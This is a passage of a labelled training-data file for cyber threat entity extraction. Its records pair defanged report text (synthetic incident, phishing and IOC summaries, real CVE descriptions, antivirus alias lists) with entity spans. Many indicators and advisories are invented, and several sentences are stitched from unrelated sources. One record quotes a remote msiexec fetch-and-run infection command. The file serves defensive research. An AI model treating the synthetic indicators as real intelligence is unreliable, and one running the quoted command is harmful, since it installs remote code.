Upon execution on Windows 11, the sample creates C:\\Program Files\\Common Files\\sam.hive and injects into legitimate processes. Network analysis shows beaconing to 134[.]39[.]77[.]45 every 60 seconds and DNS queries to nodestatic[.]link. The second stage was fetched from hxxps://storage-portal[.]online/panel/index.html and written to C:\\Windows\\Temp\\update.dll. The payload uses ADFind-style techniques for defense evasion. A secondary hash (MD5: 3aaa1ea6f7b163c41ed0dd810307d601) was extracted from the unpacked payload.", "spans": {"Malware: WarmCookie": [[25, 35]], "Indicator: 8e7d05464f9b5f901edcc20575df2b85": [[42, 74]], "System: Windows 11": [[95, 105]], "Indicator: 134.39.77.45": [[240, 258]], "Indicator: nodestatic.link": [[295, 312]], "Indicator: hxxps://storage-portal.online/panel/index.html": [[348, 396]], "Indicator: 3aaa1ea6f7b163c41ed0dd810307d601": [[525, 557]]}, "info": {"id": "synth_v2_00648", "source": "defanged_augment"}} {"text": "Deserialization of Untrusted Data, Improper Input Validation vulnerability in Apache UIMA Java SDK, Apache UIMA Java SDK, Apache UIMA Java SDK, Apache UIMA Java SDK.This issue affects Apache UIMA Java SDK: before 3.5.0.\n\nUsers are recommended to upgrade to version 3.5.0, which fixes the issue.\n\nThere are several locations in the code where serialized Java objects are deserialized without verifying the data. 
This affects in particular:\n * the deserialization of a Java-serialized CAS, but also other binary CAS formats that include TSI information using the CasIOUtils class;\n * the CAS Editor Eclipse plugin which uses the the CasIOUtils class to load data;\n * the deserialization of a Java-serialized CAS of the Vinci Analysis Engine service which can receive using Java-serialized CAS objects over network connections;\n * the CasAnnotationViewerApplet and the CasTreeViewerApplet;\n * the checkpointing feature of the CPE module.\n\nNote that the UIMA framework by default does not start any remotely accessible services (i.e. Vinci) that would be vulnerable to this issue. A user or developer would need to make an active choice to start such a service. However, users or developers may use the CasIOUtils in their own applications and services to parse serialized CAS data. They are affected by this issue unless they ensure that the data passed to CasIOUtils is not a serialized Java object.\n\nWhen using Vinci or using CasIOUtils in own services/applications, the unrestricted deserialization of Java-serialized CAS files may allow arbitrary (remote) code execution.\n\nAs a remedy, it is possible to set up a global or context-specific ObjectInputFilter (cf. hxxps://openjdk[ . ]org/jeps/290  and  hxxps://openjdk[ . ]org/jeps/415 ) if running UIMA on a Java version that supports it. \n\nNote that Java 1.8 does not support the ObjectInputFilter, so there is no remedy when running on this out-of-support platform. 
An upgrade to a recent Java version is strongly recommended if you need to secure an UIMA version that is affected by this issue.\n\nTo mitigate the issue on a Java 9+ platform, you can configure a filter pattern through the \"jdk.serialFilter\" system property using a semicolon as a separator:\n\nTo allow deserializing Java-serialized binary CASes, add the classes:\n * org.apache.uima.cas.impl.CASCompleteSerializer\n * org.apache.uima.cas.impl.CASMgrSerializer\n * org.apache.uima.cas.impl.CASSerializer\n * java.lang.String\n\nTo allow deserializing CPE Checkpoint data, add the following classes (and any custom classes your application uses to store its checkpoints):\n * org.apache.uima.collection.impl.cpm.CheckpointData\n * org.apache.uima.util.ProcessTrace\n * org.apache.uima.util.impl.ProcessTrace_impl\n * org.apache.uima.collection.base_cpm.SynchPoint\n\nMake sure to use \"!*\" as the final component to the filter pattern to disallow deserialization of any classes not listed in the pattern.\n\nApache UIMA 3.5.0 uses tightly scoped ObjectInputFilters when reading Java-serialized data depending on the type of data being expected. 
Configuring a global filter is not necessary with this version.", "spans": {"Indicator: https://openjdk.org/jeps/290": [[1675, 1707]], "Indicator: https://openjdk.org/jeps/415": [[1714, 1746]], "System: Java": [[90, 94], [112, 116], [134, 138], [156, 160], [196, 200], [353, 357], [469, 473], [696, 700], [777, 781], [1395, 1399], [1512, 1516], [1770, 1774], [1813, 1817], [1953, 1957], [2088, 2092], [2246, 2250], [3007, 3011]], "Organization: Eclipse": [[601, 608]], "System: Apache": [[78, 84], [100, 106], [122, 128], [144, 150], [184, 190], [2937, 2943]], "Vulnerability: Improper Input Validation": [[35, 60]], "Vulnerability: Deserialization": [[0, 15]], "Vulnerability: deserialization": [[448, 463], [675, 690], [1493, 1508], [2878, 2893]], "Vulnerability: code execution": [[1567, 1581]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-39913"}} {"text": "com.bbt.cmol com.sovereign.santander com.mtb.mbanking.sc.retail.prod com.fi9293.godough com.commbank.netbank org.westpac.bank org.stgeorge.bank au.com.nab.mobile au.com.bankwest.mobile au.com.ingdirect.android org.banksa.bank com.anz.android com.anz.android.gomoney com[.]citibank[.]mobile[.]au org.bom.bank com.latuabancaperandroid In addition to stealing keystrokes , Naikon also intercepted network traffic . Rancor : 199[.]247[.]6[.]253 . Note : The default log rotation configuration on NetScaler allows 25 files per log type ( e.g. 
, ns.log ) and 100 Kilobytes per log , therefore recording 2.5 megabytes in total .", "spans": {"Indicator: 199.247.6.253": [[421, 440]], "Indicator: com.citibank.mobile.au": [[266, 294]]}, "info": {"id": "cyberner_stix_train_005437", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.Killav Downloader.Betload.Win32.51 Win32.Trojan.WisdomEyes.16070401.9500.9783 Trojan[.]Win32[.]KillAV[.]me Troj.W32.SchoolGirl.tnx1 Trojan.Win32.Killav BehavesLike.Win32.Downloader.lh Trojan[.]Win32[.]KillAV[.]me Trojan.Win32.Killav BAT/KillAV.NCO Win32.Trojan.Killav.Pgwh PUA.Bat.Hoax W32/KillAV[.]ME!tr Win32/Trojan.ba9", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Trojan.Win32.KillAV.me": [[111, 139], [217, 245]], "Indicator: KillAV.ME": [[323, 334]]}, "info": {"id": "cyner2_train_006006", "source": "defanged_augment"}} {"text": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax[.]com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).", "spans": {"Indicator: qarallax.com": [[217, 231]], "Malware: Qarallax RAT": [[182, 194], [376, 388]], "System: Java": [[275, 279]], "Malware: Quaverse RAT": [[83, 95]]}, "info": {"source": "defanged_augment", "name": "Qarallax RAT"}} {"text": "Phishing Campaign Report: Rapid7 identified a large-scale phishing operation. Emails originated from billing@login-portal[.]tech and security@document-share[.]link, spoofing legitimate services. Victims were directed to hxxps://mailauth[ . ]tech/download/update.exe which hosted a credential harvesting page on cdnnode[.]tech. A secondary link hxxps://relayedge[ . ]top/callback delivered BatLoader (MD5: 7ba3bfb6e2a77aaa1f02ffaa51991d9a). 
The malware was saved to /tmp/dropper.ps1 and established C2 with 172[.]223[.]244[.]35.", "spans": {"Organization: Rapid7": [[26, 32]], "Indicator: billing@login-portal.tech": [[101, 128]], "Indicator: security@document-share.link": [[133, 163]], "Indicator: hxxps://mailauth.tech/download/update.exe": [[220, 265]], "Indicator: cdnnode.tech": [[311, 325]], "Indicator: https://relayedge.top/callback": [[344, 378]], "Malware: BatLoader": [[389, 398]], "Indicator: 7ba3bfb6e2a77aaa1f02ffaa51991d9a": [[405, 437]], "Indicator: 172.223.244.35": [[506, 526]]}, "info": {"id": "synth_v2_00953", "source": "defanged_augment"}} {"text": "The “ idXXXXX[ . ]top ” pattern immediately stands out and may suggest a pattern in the static configuration for the initial domains used by the DGA for Nymaim since the previous two started with “ ejX[ . ]com .", "spans": {"Malware: Nymaim": [[153, 159]], "Indicator: ejX.com": [[198, 209]], "Indicator: idXXXXX.top": [[6, 21]]}, "info": {"id": "cyberner_stix_train_002319", "source": "defanged_augment"}} {"text": "Lookout said in its own blog post published Wednesday that its threat detection network has recently observed a surge of Shedun attacks , indicating the scourge wo n't be going away any time soon . The researchers found that there are common elements in the macro and in the first- stage RAT used in this campaign , with former campaigns of the NICKEL ACADEMY ( Lazarus ) threat group . APT33 : 192 [ . ] 119 [ . ] 15 [ . ] 35 [REDACTED][ . ]ddns[ . ]net . 
The threat actor cleared Windows Event Logs on affected backend Exchange servers so further information was not available regarding the PowerShell commands leveraged by the threat actors .", "spans": {"Organization: Lookout": [[0, 7]], "Malware: Shedun": [[121, 127]], "Indicator: 192.119.15.35": [[395, 426]], "Indicator: [REDACTED].ddns.net": [[427, 454]]}, "info": {"id": "cyberner_stix_train_000129", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 43[.]241[.]225[.]109, the CISA IR team identified Amadey running as C:\\Users\\admin\\Downloads\\backdoor.elf. The threat actor, believed to be Lazarus Group, used Chisel for credential harvesting and Ligolo for lateral movement. Exfiltrated data was sent to gatewayapi[.]link and staticedge[.]org. The initial dropper (MD5: a60826193610bf0ce9276cd92197e17b) was delivered via a phishing email from finance@identity-verify[ . ]cc. A second C2 node was observed at 195 [ . ] 79 [ . ] 246 [ . ] 6, with a persistence mechanism writing to C:\\Users\\admin\\Desktop\\sam.hive.", "spans": {"Indicator: 43.241.225.109": [[64, 84]], "Organization: CISA": [[90, 94]], "Malware: Amadey": [[114, 120]], "Indicator: gatewayapi.link": [[319, 336]], "Indicator: staticedge.org": [[341, 357]], "Indicator: a60826193610bf0ce9276cd92197e17b": [[385, 417]], "Indicator: finance@identity-verify.cc": [[459, 489]], "Indicator: 195.79.246.6": [[524, 554]]}, "info": {"id": "synth_v2_00322", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Europol identified a large-scale phishing operation. Emails originated from confirm@account-update[ . ]xyz and alert@auth-check[.]org, spoofing legitimate services. Victims were directed to hxxp://cache-secure[ . ]dev/callback which hosted a credential harvesting page on cdncloud[ . ]net. A secondary link hxxp://proxy-update[ . ]site/download/update.exe delivered Play (SHA256: e8f1fb5a2924602e7ee92872875651fa2afbac836c2e5695e0332bccc89f33cf). 
The malware was saved to C:\\Users\\admin\\AppData\\Local\\Temp\\agent.py and established C2 with 2[.]94[.]77[.]12.", "spans": {"Organization: Europol": [[26, 33]], "Indicator: confirm@account-update.xyz": [[102, 132]], "Indicator: alert@auth-check.org": [[137, 159]], "Indicator: http://cache-secure.dev/callback": [[216, 252]], "Indicator: cdncloud.net": [[298, 314]], "Indicator: hxxp://proxy-update.site/download/update.exe": [[333, 381]], "Malware: Play": [[392, 396]], "Indicator: e8f1fb5a2924602e7ee92872875651fa2afbac836c2e5695e0332bccc89f33cf": [[406, 470]], "Indicator: 2.94.77.12": [[565, 581]]}, "info": {"id": "synth_v2_01068", "source": "defanged_augment"}} {"text": "The new SOL protocol within the PLATINUM file-transfer tool makes use of the AMT Technology SDK 's Redirection Library API ( imrsdk.dll ) . To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103 [ . ] 236 [ . ] 150 [ . ] 14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability .", "spans": {"Malware: imrsdk.dll": [[125, 135]], "Organization: Microsoft": [[326, 335]], "Vulnerability: CVE-2017-11882": [[397, 411]], "Indicator: 103.236.150.14": [[252, 284]]}, "info": {"id": "cyberner_stix_train_000565", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.VBKryptPS.Trojan Trojan/W32[.]VBKrypt[.]147456[.]CC Downldr.Umbald.S624840 Trojan.VBKrypt.Win32.179340 Troj.W32.VBKrypt.tpcC Trojan/VBKrypt.mhte Win32.Trojan.WisdomEyes.16070401.9500.9970 W32/VBTrojan.Dropper.4!Maximus Trojan.VBKrypt Trojan.Win32.VBKrypt.xabo Trojan.Win32.Umbra.efkzrr Trojan.Win32.A.VBKrypt.147456.YW BackDoor.Umbra.10 W32/VBTrojan.Dropper.4!Maximus Trojan/VBKrypt.hmyy Trojan/Win32.VBKrypt Win32.Troj.VBKrypt.kcloud TrojanDownloader:Win32/Umbald.A Trojan.Symmi.DD60 Trojan.Win32.VBKrypt.xabo Trojan/Win32.Jorik.R27694 Trojan.Crypt Win32/Delf.AVY W32/VBKrypt.MBSX!tr", 
"spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.VBKrypt.147456.CC": [[54, 81]]}, "info": {"id": "cyner2_train_006376", "source": "defanged_augment"}} {"text": "Trend of the year : mobile banking Trojans 2013 was marked by a rapid rise in the number of Android banking Trojans . TClient , for instance , uses DLL hijacking and injection that may not be as noticeable to others . The path to wmplayer[ . ]exe is provided by the Config module . Additionally , Mandiant has observed the use of the SoftPerfect network scanner ( netscan.exe ) to perform internal network enumeration .", "spans": {"System: Android": [[92, 99]], "Indicator: wmplayer.exe": [[230, 246]]}, "info": {"id": "cyberner_stix_train_004046", "source": "defanged_augment"}} {"text": "The address , 176[.]31[.]112[.]10 , is a dedicated server provided by the French OVH hosting company , but is apparently operated by an offshore secure hosting company called CrookServers.com .", "spans": {"Indicator: 176.31.112.10": [[14, 33]], "Organization: CrookServers.com": [[175, 191]]}, "info": {"id": "cyberner_stix_train_003965", "source": "defanged_augment"}} {"text": "Blog Post by INTERPOL: Tracking FIN7's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-38077 against Atlassian Confluence deployments. The initial access vector involves spear-phishing emails from alert@document-share[ . ]link delivering BumbleBee. Post-compromise, the attackers deploy QakBot and use Seatbelt for reconnaissance. C2 infrastructure includes 10[.]190[.]99[.]225 and staticproxy[.]tech. A staging server at hxxp://cache-portal[.]link/panel/index.html hosts additional tooling. 
Key artifact: C:\\Users\\admin\\Desktop\\svchost.exe (SHA256: 7c438a6638a18b87b6145c9a3bdbf0395687ba6e0f234ec9418a7b3dfa27d9a8).", "spans": {"Organization: INTERPOL": [[13, 21]], "Vulnerability: CVE-2025-38077": [[116, 130]], "System: Atlassian Confluence": [[139, 159]], "Indicator: alert@document-share.link": [[235, 264]], "Malware: BumbleBee": [[276, 285]], "Malware: QakBot": [[325, 331]], "Indicator: 10.190.99.225": [[396, 415]], "Indicator: staticproxy.tech": [[420, 438]], "Indicator: hxxp://cache-portal.link/panel/index.html": [[460, 503]], "Indicator: 7c438a6638a18b87b6145c9a3bdbf0395687ba6e0f234ec9418a7b3dfa27d9a8": [[588, 652]]}, "info": {"id": "synth_v2_01544", "source": "defanged_augment"}} {"text": "The c2 domain ( khanji[.]ddns[.]net ) was also found to be associated with multiple malware samples in the past , Some of these malware samples made connection to pastebin urls upon execution , which is similar to the behavior mentioned previously .", "spans": {"Indicator: khanji.ddns.net": [[16, 35]]}, "info": {"id": "cyberner_stix_train_001144", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 172[.]140[.]179[.]31, the SentinelOne IR team identified DarkSide running as C:\\Windows\\Temp\\config.dat. The threat actor, believed to be UNC2452, used LinPEAS for credential harvesting and Covenant for lateral movement. Exfiltrated data was sent to api-secure[.]club and secure-storage[ . ]cc. The initial dropper (SHA1: 0b8c9dc8a90fc5c67f5b61b229ffde436e391735) was delivered via a phishing email from updates@secure-verify[ . ]net. 
A second C2 node was observed at 120[.]44[.]237[.]23, with a persistence mechanism writing to C:\\Windows\\Temp\\runtime.dll.", "spans": {"Indicator: 172.140.179.31": [[64, 84]], "Organization: SentinelOne": [[90, 101]], "Malware: DarkSide": [[121, 129]], "Indicator: api-secure.club": [[314, 331]], "Indicator: secure-storage.cc": [[336, 357]], "Indicator: 0b8c9dc8a90fc5c67f5b61b229ffde436e391735": [[386, 426]], "Indicator: updates@secure-verify.net": [[468, 497]], "Indicator: 120.44.237.23": [[532, 551]]}, "info": {"id": "synth_v2_00449", "source": "defanged_augment"}} {"text": "IOC Bulletin - Qbot Campaign:\nNetwork Indicators:\n- 198[.]86[.]80[.]219\n- 151 [ . ] 89 [ . ] 140 [ . ] 145\n- 84[.]82[.]107[.]202\n- proxysync[.]top\n- login-cdn[.]live\nURLs:\n- hxxps://synccdn[.]online/login\n- hxxps://apistorage[ . ]cc/download/update.exe\nEmail Senders:\n- finance@account-update[ . ]xyz\n- contact@document-share[ . ]link\nFile Indicators:\n- SHA256: 6f3229bcedc97881aedb5e037f951f137189732eb7d4e559ef7ccc558e158f85\n- SHA1: 273b7b83f3593d2c35b90c9c6c451e51c981ef61\n- Drop path: /opt/app/bin/beacon.dll", "spans": {"Malware: Qbot": [[15, 19]], "Indicator: 198.86.80.219": [[52, 71]], "Indicator: 151.89.140.145": [[74, 106]], "Indicator: 84.82.107.202": [[109, 128]], "Indicator: proxysync.top": [[131, 146]], "Indicator: login-cdn.live": [[149, 165]], "Indicator: hxxps://synccdn.online/login": [[174, 204]], "Indicator: hxxps://apistorage.cc/download/update.exe": [[207, 252]], "Indicator: finance@account-update.xyz": [[270, 300]], "Indicator: contact@document-share.link": [[303, 334]], "Indicator: 6f3229bcedc97881aedb5e037f951f137189732eb7d4e559ef7ccc558e158f85": [[362, 426]], "Indicator: 273b7b83f3593d2c35b90c9c6c451e51c981ef61": [[435, 475]]}, "info": {"id": "synth_v2_01454", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2026-39735 is a critical CSRF vulnerability affecting Ivanti Connect Secure. 
CISA confirmed active exploitation by Sandworm in the wild. Exploitation delivers Hive (MD5: b999e3d6dc449a21df718d3763c1da50) which is dropped to C:\\Users\\admin\\Desktop\\config.dat. The exploit payload is hosted at hxxps://cloud-auth[ . ]io/secure/token and communicates to 181 [ . ] 219 [ . ] 129 [ . ] 128 for C2.", "spans": {"Vulnerability: CVE-2026-39735": [[24, 38]], "Vulnerability: CSRF vulnerability": [[53, 71]], "System: Ivanti Connect Secure": [[82, 103]], "Organization: CISA": [[105, 109]], "Malware: Hive": [[187, 191]], "Indicator: b999e3d6dc449a21df718d3763c1da50": [[198, 230]], "Indicator: hxxps://cloud-auth.io/secure/token": [[320, 358]], "Indicator: 181.219.129.128": [[379, 412]]}, "info": {"id": "synth_v2_00730", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2021-16078 is a critical type confusion affecting Palo Alto PAN-OS. NSA confirmed active exploitation by Scattered Spider in the wild. Exploitation delivers AsyncRAT (SHA1: 42023d94ec9303e6f3d8010c1b5b3aad166d85dd) which is dropped to /var/tmp/beacon.dll. The exploit payload is hosted at hxxp://edgeupdate[ . ]link/wp-content/uploads/doc.php and communicates to 75 [ . ] 20 [ . ] 59 [ . 
] 62 for C2.", "spans": {"Vulnerability: CVE-2021-16078": [[24, 38]], "Vulnerability: type confusion": [[53, 67]], "System: Palo Alto PAN-OS": [[78, 94]], "Organization: NSA": [[96, 99]], "Malware: AsyncRAT": [[185, 193]], "Indicator: 42023d94ec9303e6f3d8010c1b5b3aad166d85dd": [[201, 241]], "Indicator: http://edgeupdate.link/wp-content/uploads/doc.php": [[317, 370]], "Indicator: 75.20.59.62": [[391, 420]]}, "info": {"id": "synth_v2_00666", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu/fence: Fix oops due to non-matching drm_sched init/fini\n\nCurrently amdgpu calls drm_sched_fini() from the fence driver sw fini\nroutine - such function is expected to be called only after the\nrespective init function - drm_sched_init() - was executed successfully.\n\nHappens that we faced a driver probe failure in the Steam Deck\nrecently, and the function drm_sched_fini() was called even without\nits counter-part had been previously called, causing the following oops:\n\namdgpu: probe of 0000:04:00.0 failed with error -110\nBUG: kernel NULL pointer dereference, address: 0000000000000090\nPGD 0 P4D 0\nOops: 0002 [#1] PREEMPT SMP NOPTI\nCPU: 0 PID: 609 Comm: systemd-udevd Not tainted 6.2.0-rc3-gpiccoli #338\nHardware name: Valve Jupiter/Jupiter, BIOS F7A0113 11/04/2022\nRIP: 0010:drm_sched_fini+0x84/0xa0 [gpu_sched]\n[...]\nCall Trace:\n \n amdgpu_fence_driver_sw_fini+0xc8/0xd0 [amdgpu]\n amdgpu_device_fini_sw+0x2b/0x3b0 [amdgpu]\n amdgpu_driver_release_kms+0x16/0x30 [amdgpu]\n devm_drm_dev_init_release+0x49/0x70\n [...]\n\nTo prevent that, check if the drm_sched was properly initialized for a\ngiven ring before calling its fini counter-part.\n\nNotice ideally we'd use sched.ready for that; such field is set as the latest\nthing on drm_sched_init(). 
But amdgpu seems to \"override\" the meaning of such\nfield - in the above oops for example, it was a GFX ring causing the crash, and\nthe sched.ready field was set to true in the ring init routine, regardless of\nthe state of the DRM scheduler. Hence, we ended-up using sched.ops as per\nChristian's suggestion [0], and also removed the no_scheduler check [1].\n\n[0] hxxps://lore[ . ]kernel[ . ]org/amd-gfx/984ee981-2906-0eaf-ccec-9f80975cb136@amd.com/\n[1] hxxps://lore[.]kernel[.]org/amd-gfx/cd0e2994-f85f-d837-609f-7056d5fb7231@amd.com/", "spans": {"Indicator: https://lore.kernel.org/amd-gfx/984ee981-2906-0eaf-ccec-9f80975cb136@amd.com/": [[1689, 1774]], "Indicator: https://lore.kernel.org/amd-gfx/cd0e2994-f85f-d837-609f-7056d5fb7231@amd.com/": [[1779, 1860]], "System: Linux kernel": [[7, 19]], "System: systemd": [[735, 742]], "Vulnerability: NULL pointer dereference": [[615, 639]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-52738"}} {"text": "Malware Analysis Report: RemcosRAT (MD5: 6bf753ff87824ec41bf2cf9ab26860ba). Upon execution on Cisco ASA, the sample creates /usr/local/bin/winlogon.exe and injects into legitimate processes. Network analysis shows beaconing to 172 [ . ] 187 [ . ] 7 [ . ] 112 every 60 seconds and DNS queries to login-cache[ . ]org. The second stage was fetched from hxxp://auth-update[ . ]site/download/update.exe and written to /tmp/svchost.exe. The payload uses PowerShell Empire-style techniques for defense evasion. 
A secondary hash (SHA1: 4974b26a59a7276f5b6620322e45110f1565bfc1) was extracted from the unpacked payload.", "spans": {"Malware: RemcosRAT": [[25, 34]], "Indicator: 6bf753ff87824ec41bf2cf9ab26860ba": [[41, 73]], "System: Cisco ASA": [[94, 103]], "Indicator: 172.187.7.112": [[227, 258]], "Indicator: login-cache.org": [[295, 314]], "Indicator: http://auth-update.site/download/update.exe": [[350, 397]], "Indicator: 4974b26a59a7276f5b6620322e45110f1565bfc1": [[528, 568]]}, "info": {"id": "synth_v2_00552", "source": "defanged_augment"}} {"text": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3[.]6[.]6[.]922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CR2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated structure. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. 
Was ZDI-CAN-11434.", "spans": {"Indicator: 3.6.6.922": [[125, 140]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-27856"}} {"text": "A backdoor also known as: Backdoor/W32.Amitis.827392 Backdoor.Amitis!GgBFlh0m/G4 W32/Amitis.MXVV-8538 Backdoor.Amitis Win32/Amitis.13 BKDR_AMITIS.B Trojan.Amitis.13-B Backdoor.Win32.Amitis.13 Trojan.Win32.Amitis.dbhy Backdoor.Win32.S.Amitis.827392.A[h] Backdoor.W32.Amitis.13!c Backdoor.Win32.Amitis.13 BackDoor.Amitist.13 Backdoor.Amitis.Win32.17 BKDR_AMITIS.B BehavesLike[.]Win32[.]Downloader[.]ch W32/Amitis.N@bd Backdoor/Amitis.p W32/Amitis.C!tr Trojan[Backdoor]/Win32.Amitis Win-Trojan/Amitis.827392 Backdoor:Win32/Amitis.1_3 Win32/Amitis.13 Backdoor.Amitis Win32.Backdoor.Amitis.Akfc Backdoor.Win32.Amitis BackDoor.Amitis.G Backdoor.Win32.Amitis.13", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Downloader.ch": [[362, 399]]}, "info": {"id": "cyner2_train_007434", "source": "defanged_augment"}} {"text": "Artifact Analysis for Amadey campaign:\nStage 1 dropper at /usr/local/bin/runtime.dll - MD5: 5accbf6e241cdb2e8427a7afef730fc1\nStage 2 loader at /etc/cron.d/ntds.dit - SHA256: 51c0a4886999a2bcf0cc017844b996cdb666eb3d69a54709f566ef60160ed6af\nFinal payload at /tmp/runtime.dll - SHA1: d9845ac72966f6cfc937cb89388af51c2712c944\nExfiltration module - MD5: d148c2d45a862c3a6dabee5048770a9c\nAll stages communicated with 152 [ . ] 43 [ . ] 124 [ . ] 188. 
Chisel signatures detected in Stage 2.", "spans": {"Malware: Amadey": [[22, 28]], "Indicator: 5accbf6e241cdb2e8427a7afef730fc1": [[92, 124]], "Indicator: 51c0a4886999a2bcf0cc017844b996cdb666eb3d69a54709f566ef60160ed6af": [[174, 238]], "Indicator: d9845ac72966f6cfc937cb89388af51c2712c944": [[281, 321]], "Indicator: d148c2d45a862c3a6dabee5048770a9c": [[349, 381]], "Indicator: 152.43.124.188": [[411, 443]]}, "info": {"id": "synth_v2_01913", "source": "defanged_augment"}} {"text": "Raspberry Robin is a worm that spreads via infected USB drives and has been linked to threat actor DEV-0856. The malware uses msiexec.exe to download payloads from compromised QNAP NAS devices. Observed C2 domains include q0[ . ]fo, t1[ . ]cx, and v0[.]cx. The malware drops files to C:\\Users\\Public\\Libraries\\ and C:\\Windows\\Temp\\. Initial infection uses cmd.exe to launch msiexec with URLs like msiexec /q /i hxxp://q0[ . ]fo/b.msi. Related hashes include SHA256 7e6a2b21548ee7446c9a3e9ac3e3e93c8b06b110d2a1cea16e976e3be1e758a2 and MD5 4b41e2e5a3f44a95bfe6d0d2b6e0c1d7. The malware has been observed deploying Cobalt Strike, IcedID, and Bumblebee as secondary payloads. It communicates through Tor exit nodes at 185[.]220[.]101[.]34 and 185 [ . ] 220 [ . ] 101 [ . ] 58.", "spans": {"Malware: Raspberry Robin": [[0, 15]], "System: QNAP": [[176, 180]], "Indicator: q0.fo": [[222, 231]], "Indicator: t1.cx": [[233, 242]], "Indicator: v0.cx": [[248, 255]], "Indicator: http://q0.fo/b.msi": [[411, 433]], "Indicator: 7e6a2b21548ee7446c9a3e9ac3e3e93c8b06b110d2a1cea16e976e3be1e758a2": [[465, 529]], "Indicator: 4b41e2e5a3f44a95bfe6d0d2b6e0c1d7": [[538, 570]], "Malware: Cobalt Strike": [[612, 625]], "Malware: IcedID": [[627, 633]], "Malware: Bumblebee": [[639, 648]], "Indicator: 185.220.101.34": [[714, 734]], "Indicator: 185.220.101.58": [[739, 771]]}, "info": {"id": "malware_00014", "source": "defanged_augment"}} {"text": "Sets file creation timestamp to that of “ %SYSTEM%\\sfc[ . 
]dll ” .", "spans": {"Indicator: %SYSTEM%\\sfc.dll": [[42, 62]]}, "info": {"id": "cyberner_stix_train_005092", "source": "defanged_augment"}} {"text": "We 've seen this actor rely heavily on phishing campaigns to trick victims into downloading their malicious apps , specifically on Facebook . The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report . However, starting from 7Zip version 9.34 (next available installer after version 9.22) up to its latest version 19.0, 7zip saw and was able to extract the image file order[ . ]jpg . Second , as COSMICENERGY was potentially developed as part of a red team , this discovery suggests that the barriers to entry are lowering for offensive OT threat activity since we normally observe these types of capabilities limited to well resourced or state sponsored actors .", "spans": {"Organization: Facebook": [[131, 139]], "Organization: Novetta": [[195, 202]], "Indicator: order.jpg": [[422, 435]], "Malware: COSMICENERGY": [[450, 462]]}, "info": {"id": "cyberner_stix_train_000651", "source": "defanged_augment"}} {"text": "] databit [ . The Mofang group has been active in relation to the Kyaukphyu sez . status[ . ]acmetoy[ . ]com /DD/ myScript[ . ]js or status[ . ]acmetoy[ . ]com /DD/ css[.]css . 
On March 2 , 2021 , Microsoft released a blog post that detailed multiple zero - day vulnerabilities used to attack on - premises versions of Microsoft Exchange Server .", "spans": {"Indicator: status.acmetoy.com": [[82, 108], [133, 159]], "Indicator: myScript.js": [[114, 129]], "Indicator: css.css": [[165, 174]], "Organization: Microsoft": [[197, 206]], "Vulnerability: multiple zero - day vulnerabilities": [[242, 277]], "System: Microsoft Exchange Server": [[319, 344]]}, "info": {"id": "cyberner_stix_train_004224", "source": "defanged_augment"}} {"text": "id=eu.chainfire.supersu ) tool 246[.]us us.x SuperSU ELF binaries supersu.cfg supersu.cfg.ju supersu.cfg.old SuperSU configs with spyware implant mention bb.txt BusyBox v1.26.2 ELF file bdata.xml Config file for excluding malware components from Android battery saver feature Doze bdatas.apk Main implant module com.android.network.irc.apk Start implant module MobileManagerService.apk ASUS firmware system component ( clean ) mobilemanager.apk", "spans": {"System: Android": [[246, 253]], "Organization: ASUS": [[386, 390]], "Indicator: 246.us": [[31, 39]]}, "info": {"id": "cyner_train_000629", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 172[.]85[.]17[.]246, the Zscaler ThreatLabz IR team identified AgentTesla running as C:\\Users\\admin\\Downloads\\csrss.exe. The threat actor, believed to be BlackTech, used Mythic for credential harvesting and Sharphound for lateral movement. Exfiltrated data was sent to portalupdate[.]net and storage-gateway[ . ]link. The initial dropper (SHA256: b2962e6ba6d3b7effc326bea469b4c19a9470d7ac8f0c0ec11f14e2542198393) was delivered via a phishing email from it@auth-check[ . ]org. 
A second C2 node was observed at 151[.]209[.]150[.]155, with a persistence mechanism writing to /var/tmp/chrome_helper.exe.", "spans": {"Indicator: 172.85.17.246": [[64, 83]], "Organization: Zscaler ThreatLabz": [[89, 107]], "Malware: AgentTesla": [[127, 137]], "Indicator: portalupdate.net": [[333, 351]], "Indicator: storage-gateway.link": [[356, 380]], "Indicator: b2962e6ba6d3b7effc326bea469b4c19a9470d7ac8f0c0ec11f14e2542198393": [[411, 475]], "Indicator: it@auth-check.org": [[517, 538]], "Indicator: 151.209.150.155": [[573, 594]]}, "info": {"id": "synth_v2_00386", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed GhostPack artifacts at C:\\Users\\admin\\Downloads\\winlogon.exe. Memory dump analysis confirmed execution of LaZagne. Registry modifications pointed to persistence via /opt/app/bin/loader.exe. Network forensics identified connections to 172[.]20[.]113[.]22 and mailedge[ . ]dev. Email headers traced the initial vector to 